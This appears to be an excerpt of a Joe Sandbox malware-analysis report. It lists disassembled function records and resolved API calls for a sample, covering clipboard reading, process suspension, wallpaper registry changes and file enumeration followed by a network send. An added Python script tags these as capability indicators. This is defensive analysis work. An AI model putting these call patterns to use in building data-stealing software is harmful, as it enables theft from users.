• API String ID: 2825088817-930619648
• Opcode ID: 9e0075f8649e8eb678af43effba4d9cb246f45d30d692757a256b35a196f2dac
• Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
• Opcode Fuzzy Hash: 9e0075f8649e8eb678af43effba4d9cb246f45d30d692757a256b35a196f2dac
• Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
• Opcode ID: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
• Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
• Opcode Fuzzy Hash: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
• Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
• Opcode ID: 44ea0df9bd10d1232a8db12fadab67e0168899acaa20bfaa619f1365e862af88
• Instruction ID: 1d4fccf664b116fd7e9026c1daa93839c24cbfeedf45b0e65449f5778d70c30d
• Opcode Fuzzy Hash: 44ea0df9bd10d1232a8db12fadab67e0168899acaa20bfaa619f1365e862af88
• Instruction Fuzzy Hash: DBF0C272BC421022D82931B96DAFBFE18058742F61F15412BF302652CAD4CE6A81428F
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• IsValidCodePage.KERNEL32(00000000), ref: 00451E3A
• _wcschr.LIBVCRUNTIME ref: 00451ECA
• _wcschr.LIBVCRUNTIME ref: 00451ED8
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451F7B
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
• Opcode ID: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
• Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
• Opcode Fuzzy Hash: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
• Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
APIs
• _free.LIBCMT ref: 0044943D
  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• GetTimeZoneInformation.KERNEL32 ref: 0044944F
• WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 004494C7
• WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 004494F4
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
• API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
• String ID:
• API String ID: 806657224-0
• Opcode ID: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
• Instruction ID: d52e19fe16dfdee109f40d049db845c42e01460133d57766726f1505d2785bee
• Opcode Fuzzy Hash: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
• Instruction Fuzzy Hash: 2D31F371904205EFDB15DF69CE8186EBBB8FF0572072446AFE024A73A1D3748D41EB28
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
• Opcode ID: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
• Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
• Opcode Fuzzy Hash: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
• Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                          • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                          • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                          • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                          • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                          • ExitProcess.KERNEL32 ref: 0044338F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                          • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                          • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                          • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                                          • CloseClipboard.USER32 ref: 0040B760
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseDataOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2058664381-0
                                                                                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                          APIs
                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseHandleOpenResume
                                                                                          • String ID:
                                                                                          • API String ID: 3614150671-0
                                                                                          • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                          • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                                          • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                          • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                                          APIs
                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseHandleOpenSuspend
                                                                                          • String ID:
                                                                                          • API String ID: 1999457699-0
                                                                                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                          • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                          • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: GetLocaleInfoEx
                                                                                          • API String ID: 2299586839-2904428671
                                                                                          • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                                          • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                          • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                                          • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Find$CreateFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 341183262-0
                                                                                          • Opcode ID: 033e8258890fc957befca486fec0129e52369d73b464bfe1319a74ee7ff91c24
                                                                                          • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                          • Opcode Fuzzy Hash: 033e8258890fc957befca486fec0129e52369d73b464bfe1319a74ee7ff91c24
                                                                                          • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileFind$FirstNextsend
                                                                                          • String ID:
                                                                                          • API String ID: 4113138495-0
                                                                                          • Opcode ID: c10402a11411eb67977763d9ee290a3a58eac94241b7fce9268609e1d0d0fe6c
                                                                                          • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                          • Opcode Fuzzy Hash: c10402a11411eb67977763d9ee290a3a58eac94241b7fce9268609e1d0d0fe6c
                                                                                          • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
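The function records above list, per recovered routine, the API calls the IDA plugin resolved together with their first argument values: OpenProcess with access mask 0x0800 (PROCESS_SUSPEND_RESUME) followed by NtSuspendProcess or NtResumeProcess, GetClipboardData with format 0xD (CF_UNICODETEXT), and a FindFirstFileW/FindNextFileW loop whose subcall ends in send. The following is an added example, not part of the Joe Sandbox report, that parses blocks in this layout and tags each function with the capability its call sequence implies. The sample text is constructed from API lines on this page; the rule labels and the decision of which sequences to flag are assumptions made for illustration. The IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter triple at 0043BC69 is the MSVC runtime's abort path, seen in benign binaries too, so the example deliberately does not score it as anti-debugging.

```python
"""Added example (not Joe Sandbox code): parse the per-function 'APIs' blocks
emitted by the Joe Sandbox IDA plugin and tag capability indicators.

The sample text is constructed from API lines shown in this report; rule names
and the chosen access-mask / clipboard-format constants are assumptions made
for illustration.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample in the report's own layout (four function records).
SAMPLE_REPORT = """
APIs
• OpenClipboard.USER32(00000000), ref: 0040B74C
• GetClipboardData.USER32(0000000D), ref: 0040B758
• CloseClipboard.USER32 ref: 0040B760
Memory Dump Source
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
• NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
• CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
Memory Dump Source
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Memory Dump Source
APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC69
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
Memory Dump Source
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Name.MODULE, optional "(args)", then "ref: XXXXXXXX".
API_RE = re.compile(
    r"•\s*(?:Part of subcall function ([0-9A-Fa-f]{8}):\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?\s*,?\s*ref:\s*([0-9A-Fa-f]{8})"
)

PROCESS_SUSPEND_RESUME = "00000800"  # OpenProcess access mask 0x0800
CF_UNICODETEXT = "0000000D"          # GetClipboardData format 13


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str] = None  # callee address when reported as a subcall


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)

    def names(self):
        return {c.name for c in self.calls}

    def first_ref(self):
        return self.calls[0].ref if self.calls else "?"


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split report text into function records, one per 'APIs' header."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_RE.search(line)
        if m:
            subcall, name, module, args, ref = m.groups()
            arg_list = [a for a in (args or "").split(",") if a]
            current.calls.append(ApiCall(name, module, arg_list, ref, subcall))
        elif line == "Memory Dump Source":
            current = None  # end of the API list for this function
    return blocks


def _arg0_is(block: FunctionBlock, api: str, value: str) -> bool:
    return any(c.name == api and c.args[:1] == [value] for c in block.calls)


# Capability rules (assumed labels). The CRT pattern IsDebuggerPresent ->
# SetUnhandledExceptionFilter -> UnhandledExceptionFilter is intentionally
# absent: it is the MSVC runtime's abort path and appears in benign binaries.
RULES = [
    ("clipboard-read", lambda b: "OpenClipboard" in b.names()
        and _arg0_is(b, "GetClipboardData", CF_UNICODETEXT)),
    ("process-suspend-resume", lambda b: _arg0_is(b, "OpenProcess", PROCESS_SUSPEND_RESUME)
        and bool(b.names() & {"NtSuspendProcess", "NtResumeProcess"})),
    ("file-enum-to-socket", lambda b: {"FindFirstFileW", "FindNextFileW", "send"} <= b.names()),
]


def classify(text: str) -> List[Tuple[str, List[str]]]:
    """Return (first call ref, matched rule labels) for each flagged function."""
    findings = []
    for block in parse_blocks(text):
        hits = [label for label, pred in RULES if pred(block)]
        if hits:
            findings.append((block.first_ref(), hits))
    return findings


if __name__ == "__main__":
    for ref, labels in classify(SAMPLE_REPORT):
        print(f"function near {ref}: {', '.join(labels)}")
```

Subcall lines are kept in the parent record on purpose: the send at 00404B36 is only meaningful in combination with the enumeration loop at 00407892, which is exactly the pairing a capability rule wants to see. Argument values are matched as the zero-padded hex strings the report prints, so a rule such as the PROCESS_SUSPEND_RESUME check will miss an access mask that combines several rights; widen the comparison to a bitmask test if that matters for your triage.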
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$FreeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 3859560861-0
                                                                                          • Opcode ID: dd2f45b1bfdeb7a1a5420288e71913fa42d02de7f124d91d2f4ae112c61c3ef1
                                                                                          • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                                                          • Opcode Fuzzy Hash: dd2f45b1bfdeb7a1a5420288e71913fa42d02de7f124d91d2f4ae112c61c3ef1
                                                                                          • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 2325560087-0
                                                                                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                          • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                          • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                          • String ID:
                                                                                          • API String ID: 1663032902-0
                                                                                          • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                          • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                          • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                          • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                          • EnumSystemLocalesW.KERNEL32(00452143,00000001), ref: 0045208D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          • Opcode ID: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
                                                                                          • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
